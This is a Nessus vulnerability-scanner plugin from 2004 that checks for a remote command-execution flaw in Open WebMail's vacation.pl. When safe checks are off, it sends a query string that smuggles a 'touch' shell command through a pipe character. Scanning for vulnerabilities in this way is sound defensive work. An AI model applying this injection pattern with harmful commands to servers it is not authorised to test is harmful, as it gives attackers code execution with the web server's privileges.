#
# This script was written by George A. Theall, <theall@tifaware.com>.
#
# See the Nessus Scripts License for details.
#

if (description) {
  script_id(12637);
  script_bugtraq_id(10637);
  script_version("$Revision: 1.6 $");

  if (defined_func("script_xref")) {
    script_xref(name:"OSVDB", value:"7474");
  }

  name["english"] = "Open WebMail vacation.pl Input Validation Flaw";
  script_name(english:name["english"]);
 
  desc["english"] = "
The remote server is running at least one instance of Open WebMail whose
version is 2.32 or earlier.  The vacation.pl component in such versions
fails to validate user input, which enables remote attackers to execute
selected arbitrary programs on a target using the privileges under which
the web server operates. 

If safe_checks are disabled, Nessus attempts to create the file
/tmp/nessus_openwebmail_vacation_input_validation on the target.

For a desciption of the vulnerability, see :

  - http://sourceforge.net/forum/forum.php?thread_id=1100946&forum_id=108435

Solution : Upgrade to Open WebMail version 2.32 20040629 or later.
Risk factor : High";
  script_description(english:desc["english"]);
 
  summary["english"] = "Checks for Input Validation Flaw in Open WebMail's vacation.pl";
  script_summary(english:summary["english"]);
 
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004 George A. Theall");

  family["english"] = "CGI abuses";
  script_family(english:family["english"]);

  script_dependencie("global_settings.nasl", "openwebmail_detect.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

host = get_host_name();
port = get_http_port(default:80);
if (debug_level) display("debug: searching for input validation flaw in vacation.pl in Open WebMail on ", host, ":", port, ".\n");

if (!get_port_state(port)) exit(0);

# Check each installed instance, stopping if we find a vulnerability.
installs = get_kb_list(string("www/", port, "/openwebmail"));
if (isnull(installs)) exit(0);
foreach install (installs) {
  matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
  if (!isnull(matches)) {
    ver = matches[1];
    dir = matches[2];
    if (debug_level) display("debug: checking version ", ver, " under ", dir, ".\n");

    if (ereg(pattern:"^(1|2\.(0|1|2|3[0-2]))$", string:ver)) {
      # At this point, we know the target is running a potentially vulnerable
      # version. Still, we need to verify that vacation.pl is accessible since
      # one workaround is to simply remove the script from the CGI directory.
      foreach dir (cgi_dirs()) {
        script = "/vacation.pl";
        # If safe_checks is disabled, I'll try to create 
        # /tmp/nessus_openwebmail_vacation_input_validation as a PoC 
        # although AFAIK there's no programmatic way to verify this worked 
        # since the script doesn't display results of any commands that might
        # be run.
        if (safe_checks() == 0) script += "?-f+touch%20/tmp/nessus_openwebmail_vacation_input_validation|";
        if (debug_level) display("debug: testing ", dir, script, " on port ", port, "...\n");

        req = http_get(item:string(dir, script), port:port);
        res = http_keepalive_send_recv(port:port, data:req);
        if (res == NULL) exit(0);           # can't connect
        if (debug_level) display("debug: res =>>", res, "<<\n");

        if (egrep(string:res, pattern:"^HTTP/.* 200 OK")) {
          security_hole(port);
          exit(0);
        }
      }
    }
  }
}
